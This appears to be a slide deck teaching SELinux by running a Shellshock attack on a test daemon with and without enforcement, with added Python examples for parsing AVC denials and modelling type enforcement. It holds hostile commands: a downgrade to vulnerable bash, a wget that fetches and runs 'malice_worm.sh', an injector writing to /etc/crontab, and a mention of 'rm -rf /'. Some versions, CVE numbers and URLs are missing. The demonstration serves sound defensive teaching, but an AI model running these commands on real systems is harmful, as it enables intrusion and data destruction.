The SELinux of First Look

Prologue After many discussions with a lot of Linux users, I’ve come to realize that most of them seem to disable SELinux rather than understand why it is always denying access, and what it is worth.

Content
–Introduce SELinux
–Talk about some vulnerabilities around us
–Attack tests with or without SELinux
–Summary

SELinux Security-Enhanced Linux (SELinux) is a mandatory access control (MAC) security mechanism implemented in the kernel.

SELinux Policy The SELinux Policy is the set of rules that guide the SELinux security engine. It defines types for file objects and domains for processes. It uses roles to limit the domains that can be entered, and has user identities to specify the roles that can be attained. In essence, types and domains are equivalent, the difference being that types apply to objects while domains apply to processes.

Access Control Model
Type Enforcement (TE):
–Type Enforcement is the primary mechanism of access control used in the targeted policy.
Role-Based Access Control (RBAC):
–Based around SELinux users (not necessarily the same as the Linux user), but not used in the default targeted policy.
Multi-Level Security (MLS):
–Not commonly used; it requires installing the separate MLS policy.

What Can SELinux do? SELinux does not block the exploit itself, but it prevents escalation out of confined domains: SELinux can contain the exploit and reduce its impact.

Cyber Vulnerabilities In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance. A vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw [1].
[1] "The Three Tenets of Cyber Security". U.S. Air Force Software Protection Initiative. Retrieved

Major Events Heartbleed (CVE ), Shellshock (CVE ), …

Attack Step 1 1. Make sure Shellshock is not patched. –If your bash version is higher than (1), you need to downgrade it to (1) or a lower version.

Open Loophole –Not necessary
–wget http://test.njucs-os.tk/selinuxtest/bash el7.x86_64.rpm
–yum downgrade bash el7.x86_64.rpm
–wget http://test.njucs-os.tk/selinuxtest/region_date_daemon
–wget
–Run start.sh

Attack Step 2 Test Shellshock

Attack Step 3 3. Run it to display the current date over TCP. It displays the current date and time in the given format when local-info is input. Example:

Attack Step 4 4. Change the file contexts. –If SELinux is enabled, the behavior of date_daemon is restricted to its domain by the context.

Attack Step 5 5. Prepare the “malicious” script Injector.
#!/bin/bash
# Injector: prints a marker, appends it to a log file in /tmp, and then
# appends a comment line to /etc/crontab (the write the later test checks).
now=$(date)
echo "$now: Your OS is pwned!"
echo "$now: Your OS is pwned!" >> /tmp/pwn.log
echo "# $now: Your OS is pwned!" >> /etc/crontab
It is a very friendly malicious script! :P

Attack Tests In the test, we write a daemon running on CentOS with SELinux in enforcing mode or permissive mode, and run a designed Shellshock attack on it. The set of commands made up for this test, Injector.sh:
–rm malice_worm.sh ;
–wget --no-verbose --output-document=malice_worm.sh os.tk/selinuxtest/malice_worm.sh;
–rm injector.sh ;
–bash malice_worm.sh
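What a defender looks at after the enforcing-mode and permissive-mode runs is the AVC records in /var/log/audit/audit.log. The following is an added example, not code from the slides: a small parser over constructed sample records (the type names dhcpd_t and system_cron_spool_t come from the slides; pids, inodes, timestamps and serials are made up) that separates denials that were actually blocked (permissive=0) from denials that were only logged while the access went through (permissive=1).

```python
"""Added example (not from the slides): parse SELinux AVC records the way a
defender reads /var/log/audit/audit.log after an enforcing-mode and a
permissive-mode run. SAMPLE_LOG is CONSTRUCTED for illustration."""
import re
from typing import Optional

# Constructed sample: the same denial in enforcing (permissive=0) and in
# permissive (permissive=1) mode, plus a non-AVC record that must be skipped.
SAMPLE_LOG = """\
type=AVC msg=audit(1415029868.312:1042): avc:  denied  { write } for  pid=2731 comm="bash" name="crontab" dev="dm-0" ino=131204 scontext=system_u:system_r:dhcpd_t:s0 tcontext=system_u:object_r:system_cron_spool_t:s0 tclass=file permissive=0
type=SYSCALL msg=audit(1415029868.312:1042): arch=c000003e syscall=2 success=no exit=-13 comm="bash" exe="/usr/bin/bash" subj=system_u:system_r:dhcpd_t:s0 key=(null)
type=AVC msg=audit(1415029901.044:1057): avc:  denied  { write } for  pid=2790 comm="bash" name="crontab" dev="dm-0" ino=131204 scontext=system_u:system_r:dhcpd_t:s0 tcontext=system_u:object_r:system_cron_spool_t:s0 tclass=file permissive=1
"""

_HEAD = re.compile(r"audit\((\d+\.\d+):(\d+)\)")
_AVC = re.compile(r"avc:\s+(denied|granted)\s+\{\s*([^}]*?)\s*\}\s+for\s+(.*)$")
_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_avc(line: str) -> Optional[dict]:
    """Turn one AVC record into a dict; return None for any other record type."""
    if not line.startswith("type=AVC"):
        return None
    m = _AVC.search(line)
    if m is None:
        return None
    verdict, perms, rest = m.groups()
    rec = {"verdict": verdict, "perms": perms.split()}
    head = _HEAD.search(line)
    if head:
        rec["time"], rec["serial"] = float(head.group(1)), int(head.group(2))
    for key, val in _KV.findall(rest):
        rec[key] = val.strip('"')
    # permissive=1 means the denial was only logged and the access went through.
    # When the field is missing we treat the record as enforcing (assumption).
    rec["permissive"] = int(rec.get("permissive", "0"))
    # A context is user:role:type[:level]; the third field is the domain / type.
    rec["sdomain"] = rec.get("scontext", "::?").split(":")[2]
    rec["ttype"] = rec.get("tcontext", "::?").split(":")[2]
    return rec


def confinement_report(lines) -> list:
    """One row per denied permission: which confined domain tried what on
    which type, and whether enforcing mode actually blocked it."""
    rows = []
    for line in lines:
        rec = parse_avc(line)
        if rec is None or rec["verdict"] != "denied":
            continue
        for perm in rec["perms"]:
            rows.append({
                "serial": rec.get("serial"),
                "domain": rec["sdomain"],
                "target": rec["ttype"],
                "class": rec.get("tclass"),
                "perm": perm,
                "comm": rec.get("comm"),
                "name": rec.get("name"),
                "blocked": rec["permissive"] == 0,
            })
    return rows


if __name__ == "__main__":
    for row in confinement_report(SAMPLE_LOG.splitlines()):
        state = "BLOCKED" if row["blocked"] else "LOGGED ONLY (permissive)"
        print(f"{row['domain']} -> {row['target']} {row['class']} {row['perm']} "
              f"({row['comm']} on {row['name']}): {state}")
```

The permissive column is the point of the permissive-mode run: the same denial shows up in the log, but the write to /etc/crontab was not stopped, so a log full of AVC records is only evidence of confinement when permissive=0. On a real system `ausearch -m AVC` returns the same records.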

Attack Step 6 6.Attack OS with SELinux

Attack Step 7 7.Attack OS without SELinux

What-If… What would happen if the command “rm -rf /” were put in the Injector?

Awesome SELinux protects your OS even when your software's security fails. How does SELinux accomplish this protection? –It utilizes control points on the objects in the system.

Control Point The following types are used with DHCP:
dhcp_etc_t –This type is mainly used for files in the /etc/ directory, including configuration files.
dhcpd_var_run_t –This type is used for the PID file for dhcpd, in the /var/run/ directory.
dhcpd_exec_t –This type is used for transition of DHCP executable files to the dhcpd_t domain.
dhcpd_initrc_exec_t –This type is used for transition of DHCP executable files to the dhcpd_initrc_t domain.

But the type of /etc/crontab is system_cron_spool_t, and a process that entered the dhcpd_t domain through dhcpd_exec_t has no rule allowing it to write to /etc/crontab.
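To make the type enforcement model from the Access Control Model slide and the control-point argument above concrete, here is an added example (not code from the slides, and not the real Fedora/CentOS dhcp policy module): a toy TE engine that parses security contexts and a constructed allow/type_transition rule set, then replays the scenario. init enters dhcpd_t through dhcpd_exec_t, the injected shell stays in dhcpd_t because no transition applies to it, and a write to a system_cron_spool_t file is denied simply because no rule permits it. The rule syntax, the init_t type and shell_exec_t are assumptions for the example; only the dhcpd type names come from the slides.

```python
"""Added example (not from the slides): a toy type-enforcement engine that
shows why the confined daemon cannot write /etc/crontab. Contexts are
user:role:type[:level]; a process's type is its domain, a file's type is
its label, and an access is permitted only when an explicit allow rule says
so (default deny). TOY_POLICY is CONSTRUCTED, not the real dhcp module."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Context:
    user: str
    role: str
    type: str          # domain for a process, label for an object
    level: str = "s0"  # MLS/MCS range; carried along but ignored by TE


def parse_context(text: str) -> Context:
    """Parse the form printed by ls -Z / ps -Z, e.g. system_u:object_r:dhcp_etc_t:s0."""
    parts = text.split(":", 3)  # maxsplit keeps ranges like s0-s0:c0.c1023 intact
    if len(parts) < 3:
        raise ValueError(f"malformed context: {text!r}")
    return Context(parts[0], parts[1], parts[2], parts[3] if len(parts) == 4 else "s0")


# allow <src_type> <tgt_type>:<class> { perm ... };
_ALLOW = re.compile(r"allow\s+(\w+)\s+(\w+):(\w+)\s+\{\s*([\w\s]*?)\s*\};")
# type_transition <src_domain> <entry_type>:process <new_domain>;
_TRANS = re.compile(r"type_transition\s+(\w+)\s+(\w+):process\s+(\w+);")


def parse_policy(text: str):
    """Return (allow_rules, transitions): allow_rules maps (src, tgt, class) to
    the set of permitted operations; transitions maps (domain, exec type) to
    the domain a newly executed process enters."""
    allow = {}
    for src, tgt, cls, perms in _ALLOW.findall(text):
        allow.setdefault((src, tgt, cls), set()).update(perms.split())
    trans = {(src, entry): new for src, entry, new in _TRANS.findall(text)}
    return allow, trans


def permitted(allow, scontext: str, tcontext: str, tclass: str, perm: str) -> bool:
    """TE decision: only the two types matter, and absence of a rule is a denial."""
    src = parse_context(scontext).type
    tgt = parse_context(tcontext).type
    return perm in allow.get((src, tgt, tclass), set())


def exec_domain(trans, domain: str, exec_type: str) -> str:
    """Domain of a child after exec: a type_transition moves it, otherwise it
    stays in the caller's domain. (Real policy also requires execute, transition
    and entrypoint allow rules for the move; the toy omits them.)"""
    return trans.get((domain, exec_type), domain)


# Constructed toy policy: dhcpd reads its config, writes its pid file, is entered
# from init via dhcpd_exec_t, and has no rule at all for system_cron_spool_t.
TOY_POLICY = """
allow dhcpd_t dhcp_etc_t:file { read getattr open };
allow dhcpd_t dhcpd_var_run_t:file { create write open };
allow init_t dhcpd_exec_t:file { execute };
type_transition init_t dhcpd_exec_t:process dhcpd_t;
"""
ALLOW, TRANS = parse_policy(TOY_POLICY)


def walk_attack() -> dict:
    """Replay the slides' scenario: init starts the daemon, the injected shell
    inherits dhcpd_t, and the crontab write is checked against the policy."""
    daemon = exec_domain(TRANS, "init_t", "dhcpd_exec_t")
    shell = exec_domain(TRANS, daemon, "shell_exec_t")  # no transition: stays confined
    subject = f"system_u:system_r:{shell}:s0"
    return {
        "daemon_domain": daemon,
        "shell_domain": shell,
        "config_read": permitted(ALLOW, subject, "system_u:object_r:dhcp_etc_t:s0", "file", "read"),
        "crontab_write": permitted(ALLOW, subject, "system_u:object_r:system_cron_spool_t:s0",
                                   "file", "write"),
    }


if __name__ == "__main__":
    for key, value in walk_attack().items():
        print(f"{key}: {value}")
```

The design point is the default-deny lookup in `permitted`: the confined shell is not denied because a rule forbids crontab writes, but because nothing grants them, which is why the file context on /etc/crontab and the domain the daemon runs in are the two control points that decide the outcome.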

Graphic Interpretation (figure): Without SELinux / With SELinux

Conclusion SELinux does not block the exploit itself, but it prevents escalation out of confined domains. Based on SELinux, we can build more enhanced security protection mechanisms.

Thank you!